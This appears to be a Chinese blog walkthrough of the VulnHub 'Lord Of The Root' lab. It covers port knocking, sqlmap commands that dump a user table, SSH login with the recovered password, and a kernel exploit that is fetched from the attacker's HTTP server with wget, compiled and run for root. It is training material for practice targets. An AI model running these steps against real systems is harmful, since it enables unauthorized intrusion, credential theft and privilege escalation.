6-VulnHub-Lord Of The Root 1.0.1
VulnHub-Lord Of The Root: 1.0.1
靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/
目标:得到root权限&找到flag.txt
作者:尼德霍格007
时间:2021-7-16
信息收集
扫描目标主机
nmap -sP 192.168.21.0/24
扫描开放端口
nmap -A -p 1-1000 192.168.21.141
看到只开放了22端口,尝试连接一下
easy as 1,2,3
提示敲门程序在运行
发送tcp的数据包分别到这三个端口
nmap -r -Pn -p 1,2,3 192.168.21.141
再次扫描端口
发现开启了1337端口,是个web服务,尝试访问
只有一张图,英文来自指环王,意思是我愿意把魔戒带到MORDOR,访问一下mordor试试
查看源代码
有一串密文,像是base64
THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh
解密两次得到
/978345210/index.php
是一个路径,访问
获取shell
尝试弱口令登陆失败,就不放图了
不知道用户名和密码的情况下,可以使用SQLMAP注入试一下
sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms --dbs
-o:开启所有优化
-u:指定目标URL
–forms:自动判断注入
–dbs:枚举DBMS所有的数据库名称
(有提示y/n时,看不懂默认y就可以或者直接回车)
这里获得了一个Webapp数据库,继续获取Webapp表信息
sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp --tables
-D:指定数据库
–tables:列出该数据库所有的表
这里获得了一个Users表
继续对表内容进行信息获取
sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp -T Users --columns
-T:指定表
–columns:列出该表的所有表项
表中有三个字段id,password,和username
继续获取表中详细信息
sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp -T Users -C id,username,password --dump
-C:指定列
–dump:转储DBMS的数据库中的表项
得到用户名和密码,使用这些用户名和密码ssh登录
ssh *用户名*@*ip*
最后成功登录
用户名:smeagol
密码:MyPreciousR00t
提权
uname -a查看靶机内核版本和系统版本
在https://www.exploit-db.com/查找可利用漏洞
点击下载按钮把exp文件下载到本地
在kali攻击机用python开启一个简单的http服务
python -m SimpleHTTPServer 6666
把文件下载到靶机
靶机执行
wget http://192.168.21.128:6666/39166.c
编译
gcc 39166.c -o p
-o指定编译后的文件名
给执行权限
chmod +x p
运行
./p
此时可以看到已经是root组的用户了,提权成功
获得flag,任务完成
总结
这次的漏洞复现主要考察了port_knocking、使用sqlmap获取数据库信息和利用ubuntu系统漏洞来提权,难度适中。对我来说,port_knocking是之前没有见到过的,需要多加练习。而且使用sqlmap获取数据库信息和查找系统漏洞进行利用的能力也需要多加锻炼。
6-VulnHub-Lord Of The Root 1.0.1相关推荐
- VulnHub靶场之BBS (cute): 1.0.1
VulnHub靶场之BBS (cute): 1.0.1 扫描IP以及端口: 先不管其他东西,直接访问80,web页面: 目录扫描: 访问index.php: 发现使用的是CuteNews 2.1.2, ...
- mysql开启skip-name-resolve 导致root@127.0.0.1(localhost)访问引发的ERROR 1045 (28000)错误解决方案...
为什么配置skip-name-resolve? 由于mysql -h${ip} 远程访问速度过慢, mysql -h172.16.66.171 -uroot -p123456 根据网友经验(https ...
- 登录或连接MYSLQ 提示 error 1045 access denied for user 'root@127.0.0.1' 错误
MYSQL登陆不了 出现1024错误 类似: 用 root 登陆 出现: Access denied for user 'root@127.0.0.1' (password yes),密码是正确的 ...
- 【渗透测试】VulnHub-Lord Of The Root: 1.0.1
VulnHub-Lord Of The Root: 1.0.1 VulnHub-Lord Of The Root: 1.0.1渗透测试详细流程 小知识点 一.端口碰撞(portknocking) 二. ...
- mySQL:Access denied for user 'root'@'127.0.0.1' to database 'information_schema'
在写程序时尝试修改视图的备注,可是mysql并没有提供这样的功能,可是查询视图结构时明明能够看到有的视图是有注释信息的,这些信息是写到information_schema里的,那如果直接更新infor ...
- l连接mysql数据库时报错(1045, Access denied for user 'root'@'127.0.0.1 (using password: YES))
具体内容:Traceback (most recent call last): File "E:/python_events/ch01/mysqldb_test.py", line ...
- linux root hd0 0,root (hd0 0)讲解
hd0,0 指得是 0号硬盘的0号分区,以此类推,hd0,2 指的是0号硬盘的2号分区.这里hd应该是硬盘的缩写,和sda, hda没关系.(说错求砖头,哈哈)另外这里的root,指得是可引导的分区, ...
- 1405 Access denied for user ‘root@127.0.0.1‘
1405 Access denied for user 'root@127.0.0.1' 连接不上 右键点击数据库的连接属性,改为正确的用户名和密码
- Vulnhub靶机:HACKER KID_ 1.0.1
目录 介绍 信息收集 主机发现 主机信息探测 53 端口 网站探测 页面源代码 DIG信息收集 经典XXE漏洞 探测9999端口 SSTI模板注入 Capabilities 提权 发现具有Capabi ...
最新文章
- Python基础06-数据类型:元组tuple
- MS SQL入门基础:备份和恢复系统数据库
- 边缘计算对于工业物联网的重要性
- linux打理ftp用户,Linux中如何添加/删除FTP用户并设置权限
- 几乎所有的成功都是厚积薄发
- 微信小程序 推送模板教程 附源码
- 系统磁盘空间满的一个问题
- php权限设置,php设置权限的方法
- Linux内核开发人员考虑剔除对更多老旧平台的处理器支持
- 【A little interesting】LeetCode 437. Path Sum III
- 小米盒子 计算机共享,小米盒子如何通过局域网共享安装软件
- c语言自学教程——博文总结
- 如何测试聊天机器人的 10 个最佳实践
- 优秀博士生和普通博士生差距能有多大?
- scripts to compositions to videos
- Magisk使用记录
- Cesium — orientation计算
- JAVA开发基础之使用IDEA导出JAR包
- [配置]keepalived配置高可用虚拟IP不通
- PySOT测试报错:AssertionError: /pysot/experiments/siamrpn_r50_l234_dwxcorr/Basketball/img/0001.jpg
热门文章
- Lecture 21
- [转载] 地下创业,遵守游戏规则方能细水长流
- 四级网络工程师:局域网技术
- Windows Server 2008 R2——由于管理员设置的策略,该磁盘处于脱机状态-解决方案
- PAT 10. 查找指定字符 python
- 2022-02-12生活日志
- MATLAB算法实战应用案例精讲-【图像处理】数字图像海报化(附Java、python、matlab和R语言代码实现)
- Android相机实时自动对焦的完美实现
- 2013年软件工程c语言,《C语言程序设计》实验报告模板-2013级软件工程.doc
- python代码写父亲节快乐_用python祝福父亲节_父亲节祝福语 父亲节最感恩温馨的问候语录...